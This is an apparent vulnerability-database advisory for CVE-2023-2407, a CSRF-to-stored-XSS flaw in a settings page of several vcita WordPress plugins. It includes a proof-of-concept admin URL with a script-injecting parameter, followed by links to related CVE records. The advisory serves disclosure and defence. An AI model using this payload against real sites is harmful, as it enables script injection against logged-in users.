Lucene search
WpvulndbWPEX-ID:883C0425-9B18-4F52-8956-5264B8F12B99HistoryJun 02, 2023 - 12:00 a.m.
Multiple plugins by vcita - CSRF to Stored XSS in settings page
2023-06-0200:00:00
wpvulndb
79
csrf
stored xss
vcita plugin
wordpress security
cross-site scripting
EPSS
0.002
Percentile
51.5%
The plugin does not protect the live-site-parse-vcita-callback settings page against CSRF attacks, allowing an unauthenticated attacker to inject arbitrary web scripts by tricking a logged in user with contributor role or higher to click a link.
https://example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&uid=a&first_name=a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a“/><script>alert(1);</script>References
Related
wpvulndb
wpvulndb
Multiple plugins by vcita - CSRF to Stored XSS in settings page
2023-06-02 00:00:00
prion
prion
Cross site request forgery (csrf)
2023-06-03 05:15:00
nvd
nvd
CVE-2023-2407
2023-06-03 05:15:09
cve
cve
CVE-2023-2407
2023-06-03 05:15:09
cvelist
cvelist
CVE-2023-2407
2023-06-03 04:35:13
wordfence
wordfence